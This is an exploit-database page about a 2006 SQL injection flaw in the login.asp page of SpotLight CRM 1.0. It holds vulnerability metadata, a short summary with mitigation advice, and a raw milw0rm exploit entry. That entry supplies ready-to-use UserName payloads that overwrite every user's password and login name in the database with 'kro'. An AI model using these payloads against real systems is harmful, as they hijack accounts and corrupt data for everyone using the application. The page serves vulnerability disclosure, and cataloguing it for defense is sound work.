header-logo
Suggest Exploit
vendor:
SpotLight CRM
by:
ajann
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: SpotLight CRM
Affected Version From: SpotLight CRM 1.0
Affected Version To: SpotLight CRM 1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2006

SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability

The SpotLight CRM 1.0 web application is vulnerable to remote SQL injection. An attacker can exploit this vulnerability by sending a specially crafted SQL query through the login.asp page. This allows the attacker to manipulate the database and potentially gain unauthorized access to sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use parameterized queries or prepared statements to prevent SQL injection attacks. Additionally, keeping the software up to date with the latest security patches and regularly monitoring for any suspicious activity can help prevent such vulnerabilities.
Source

Exploit-DB raw data:

*************************************************************************************
# Title   :  SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
# Author  :   ajann
# Contact :   :(
# $$$     :  $2,499

*************************************************************************************


[[SQL]]]

###http://[target]/[path]//login.asp=[POST SQL]

Example:
-> All User UserName And Password Changed "kro"

// login.asp UserName: ';update login set password='kro'--
// login.asp UserName: ';update login set loginName='kro'--

[[/SQL]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-09]

Navigation

Suggest Exploit

Services By CQR